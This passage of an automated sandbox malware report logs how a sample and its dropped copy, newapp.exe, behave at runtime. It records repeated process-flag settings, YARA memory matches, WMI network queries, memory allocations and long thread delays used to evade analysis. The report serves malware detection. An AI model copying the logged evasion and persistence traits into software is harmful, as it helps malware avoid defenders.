                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: iNFGd6bDZX.exe PID: 7352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 7984, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeMemory allocated: C70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeMemory allocated: 2660000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeMemory allocated: 2570000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeMemory allocated: 4C00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeMemory allocated: 5C00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeMemory allocated: 5D30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeMemory allocated: 6D30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeMemory allocated: 9A20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeMemory allocated: AA20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeMemory allocated: AEB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeMemory allocated: BEB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeMemory allocated: 1960000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeMemory allocated: 3390000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeMemory allocated: 3270000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 14D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 32F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 30B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 58F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 68F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 6A20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 7A20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: A3A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: B3A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: B830000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: C830000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 28A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 2920000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: C70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 2680000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 24D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 4C40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 5C40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 5D70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 6D70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 9390000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: A390000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: B390000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: B820000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 2920000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 2AB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 4AB0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 599812Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 599664Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 599365Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 599234Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 599123Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 599015Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 598906Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 598797Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 598687Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 598578Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 598469Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 598344Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 598234Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 598125Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 598015Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 597906Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 597797Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 597687Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 597578Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 597468Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 597358Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 597250Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 597140Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 597029Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 596915Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 596801Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 596672Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 596562Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 596453Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 596343Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 596233Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 596125Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 596015Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 595906Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 595797Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 595687Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 595578Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 595468Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 595359Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 595250Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 595140Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 595031Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 594919Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 594797Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 594687Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 594576Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 594468Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 594329Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 594207Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 594078Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599891Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599781Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599672Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599562Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599453Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599341Jump to behavior
